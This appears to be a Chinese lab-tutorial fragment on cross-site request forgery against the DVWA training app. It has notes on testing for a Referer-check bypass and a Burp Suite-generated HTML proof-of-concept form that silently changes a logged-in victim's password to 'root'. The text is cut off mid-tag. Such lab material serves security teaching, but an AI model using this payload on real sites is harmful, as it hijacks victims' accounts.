目录
2. 引诱登录的用户触发这个js脚本就可以完成修改密码的攻击.
1. 检查referer
设置一个虚假的referer 与 源请求头均请求后做比较,如果返回的长度相同,那么网站在处理HTTP请求之前实际上不会验证referer
referer绕过
当使用一个普通的表单类型的钓鱼链接时, 比如 http://192.168.112.202/csrf.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.112.200/DVWA-master/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="root" />
<input type="hidden" name="password_conf" value="root" />
<input type="hidden" name="Change" value="Change" />
<input type="